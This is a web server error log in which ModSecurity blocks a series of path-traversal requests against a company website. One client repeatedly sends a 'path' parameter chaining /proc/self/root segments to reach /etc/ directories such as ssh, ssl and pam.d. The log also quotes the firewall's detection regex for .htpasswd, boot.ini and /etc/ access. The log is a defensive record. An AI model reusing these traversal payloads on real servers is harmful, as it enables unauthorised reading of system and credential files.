[Mon Mar 16 09:27:28.660973 2026] [:error] [pid 21805:tid 140411616036608] [client 74.7.243.203:37394] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf3MLABkC4fWIHEf8HXEQAAAE8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:27:31.031530 2026] [:error] [pid 32654:tid 140411590858496] [client 74.7.243.203:37404] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf3MwlT9VtDQc7bgUyX2gAAARI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:27:32.392555 2026] [:error] [pid 21806:tid 140411590858496] [client 74.7.243.203:45130] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf3NNSswJuvopo3lOhMlQAAAJI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:27:33.579027 2026] [:error] [pid 21805:tid 140411565680384] [client 74.7.243.203:45142] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf3NbABkC4fWIHEf8HXEgAAAFU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:27:34.912282 2026] [:error] [pid 21805:tid 140411708356352] [client 74.7.243.203:45158] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf3NrABkC4fWIHEf8HXEwAAAEQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:27:36.281019 2026] [:error] [pid 11972:tid 140411540502272] [client 74.7.243.203:45174] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf3OJqj1wV0Si-OkefVggAAABg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:27:37.437048 2026] [:error] [pid 32654:tid 140411557287680] [client 74.7.243.203:45184] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf3OQlT9VtDQc7bgUyX3QAAARY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:27:41.701658 2026] [:error] [pid 10709:tid 140411607643904] [client 74.7.243.203:45192] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf3PRXjF1vJNtV6CWrlJQAAAdA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:27:49.515777 2026] [:error] [pid 10651:tid 140411699963648] [client 74.7.243.203:57332] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf3RbysWC90G-1nBrAxhgAAAYU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:27:50.842874 2026] [:error] [pid 10831:tid 140411708356352] [client 74.7.243.203:43786] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf3Ro6lpbStxTqkSktbdAAAAkQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:28:07.682883 2026] [:error] [pid 21533:tid 140411624429312] [client 74.7.244.31:60468] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abf3V3jZBu2q05ozVU9CPgAAAU4"]
[Mon Mar 16 09:28:15.827327 2026] [:error] [pid 10651:tid 140411725141760] [client 74.7.243.203:43796] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf3X7ysWC90G-1nBrAxpgAAAYI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:28:18.152803 2026] [:error] [pid 21805:tid 140411632822016] [client 74.7.243.203:45968] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf3YrABkC4fWIHEf8HXGwAAAE0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:28:21.794954 2026] [:error] [pid 21946:tid 140411616036608] [client 74.7.243.203:45974] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf3ZXbQATo66fKoS7w4xAAAAM8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:28:23.412020 2026] [:error] [pid 21806:tid 140411599251200] [client 74.7.243.203:58104] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf3Z9SswJuvopo3lOhMmgAAAJE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:29:08.573186 2026] [:error] [pid 21805:tid 140411582465792] [client 74.7.243.203:58120] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf3lLABkC4fWIHEf8HXSQAAAFM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:29:20.705895 2026] [:error] [pid 10772:tid 140411624429312] [client 74.7.243.203:54696] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf3oP9ocpUE4ed4uDzZRgAAAg4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:30:06.363683 2026] [:error] [pid 10831:tid 140411624429312] [client 74.7.243.203:33602] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf3zo6lpbStxTqkSktbwAAAAk4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:30:09.779926 2026] [:error] [pid 10831:tid 140411582465792] [client 74.7.243.203:50514] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf30Y6lpbStxTqkSktbwwAAAlM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:30:11.091335 2026] [:error] [pid 32654:tid 140411683178240] [client 74.7.243.203:48480] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf30wlT9VtDQc7bgUyX-gAAAQc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:30:12.412603 2026] [:error] [pid 21806:tid 140411708356352] [client 74.7.243.203:48490] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf31NSswJuvopo3lOhMsQAAAIQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:30:15.042827 2026] [:error] [pid 21533:tid 140411624429312] [client 74.7.243.203:48496] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf313jZBu2q05ozVU9CVgAAAU4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
